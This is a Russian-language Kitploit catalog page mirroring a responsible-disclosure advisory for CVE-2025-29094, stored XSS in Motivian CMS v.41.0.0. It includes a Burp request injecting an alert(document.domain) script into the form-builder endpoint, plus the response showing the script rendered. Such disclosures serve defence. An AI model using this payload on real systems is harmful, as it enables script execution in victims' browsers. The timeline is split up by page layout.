Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — Этот репозиторий раскрывает уязвимость безопасности, обнаруженную в Motivian Content Management System v.41.0.0. | Kitploit
Инструменты/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Этот репозиторий раскрывает уязвимость безопасности, обнаруженную в Motivian Content Management System v.41.0.0.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
6 месяцев назадЕщё не проверено

CVE-2025-29094-Множественные-хранимые-межсайтовые-скрипты-XSS

Этот репозиторий раскрывает уязвимость безопасности, обнаруженную в Motivian Content Management System v.41.0.0.

  • CVE-2025-29094: Множественные хранимые межсайтовые скрипты (XSS)

Эта уязвимость была сообщена поставщику в соответствии с практикой ответственного раскрытия, а также в MITRE, который присвоил временный идентификатор CVE. Подробности публикуются после истечения 45-дневного периода раскрытия.

Общая информация

  • Название: Хранимый межсайтовый скриптинг (XSS) Motivian
  • Тип уязвимости: Хранимый XSS
  • Поставщик продукта: Motivian
  • Продукт: Motivian Content Management System
  • Затронутая версия: Motivian CMS v.41.0.0
  • Затронутые компоненты: Marketing/Forms, Marketing/Offers, Content/Pages
  • Вектор атаки: Удаленный
  • Воздействие: Произвольное выполнение JavaScript в браузере жертвы
  • Серьёзность: Высокая
  • Оценка CVSSv3: 7.6
  • Вектор CVSSv3: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • Серьёзность по CISA-ADP: Средняя
  • Оценка CVSSv3 по CISA-ADP: 6.1
  • Вектор CVSSv3 по CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Обнаружено: 2025-01-29
  • Автор: Francesco Marcuccio
  • Статус: Сообщено поставщику 7 апреля 2025 г. — Ответ/исправление не получены к 22 мая 2025 г.

Описание

Уязвимость межсайтового скриптинга в Motivian Content Management System v.41.0.0 позволяет удаленному атакующему выполнить произвольный код через компоненты Marketing/Forms, Marketing/Offers и Content/Pages. Уязвимость была использована путем внедрения вредоносного JavaScript-кода в различные поля, включая заголовок в Marketing/Form и Marketing/Offers, а также поле header script в Content/Pages.

Подтверждение концепции

Уязвимость может быть использована через различные поля в разных компонентах. В целях демонстрации следующее подтверждение концепции фокусируется на конкретном сценарии:

  1. Перейдите в раздел Marketing/Forms и создайте новый элемент формы.
  2. Вставьте вредоносный скрипт в поле Name и сохраните форму.

Ниже приведена полная расшифровка HTTP-запросов и ответов, использованных для демонстрации проблемы:

Запрос Burp

root@kitploit:~
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]

Ответ Burp

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]

Устранение

Очищайте все вводимые пользователем данные и экранируйте вывод перед рендерингом. Внедрите заголовок Content Security Policy (CSP) для снижения рисков XSS.

Временная шкала раскрытия

ДатаДействие
2025-02-06Запрос CVE ID (CNA: MITRE)
2025-04-02

Авторы

  • Обнаружено и ответственно раскрыто:
    Francesco Marcuccio
    Консультант по кибербезопасности, специалист по тестированию на проникновение

  • Атрибуция первооткрывателя MITRE указана как:
    Francesco Marcuccio
    Консультант по кибербезопасности, специалист по тестированию на проникновение

Ссылки

Ссылки: MITRE NIST

Статус

Этот CVE ID официально находится в статусе PUBLISHED. Он будет обновлён с оценкой CVSS от NIST после анализа.

Скачать инструмент
Назначение CVE ID
2025-04-07Уязвимости сообщены поставщику
2025-05-31Публичное раскрытие после истечения 45-дневного периода раскрытия (всего 54 дня)
2025-06-04Официальная регистрация и внесение в базу данных MITRE и портал NIST/NVD